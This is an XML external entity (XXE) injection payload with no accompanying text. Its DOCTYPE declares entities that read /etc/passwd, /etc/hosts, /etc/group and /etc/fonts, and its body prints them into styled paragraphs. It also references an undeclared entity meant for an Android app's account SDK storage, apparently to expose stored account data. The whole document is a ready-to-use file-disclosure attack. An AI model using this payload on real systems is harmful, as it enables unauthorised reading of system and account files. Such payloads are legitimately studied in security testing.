<?xml-stylesheet type="text/xml" href="https://sumsec.me"?>
<!DOCTYPE p [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY group SYSTEM "file://localhost/etc/group">
<!ENTITY fonts SYSTEM "file://etc/fonts">

]>

<p>


  <p style="border-style: dotted;">/etc/passwd:

&passwd;
  </p >
 <p style="border-style: dotted;" id="hosts">/etc/hosts:

&hosts;
  </p >
 <p style="border-style: dotted;">/etc/group:

&group;
  </p >
 <p style="border-style: dotted;">/etc/fonts:

&fonts;
  </p >
 <p style="border-style: dotted;">/data/data/com.yiqixie.kem/files/mmkv/account_sdk:

&account;
  </p >
</p >
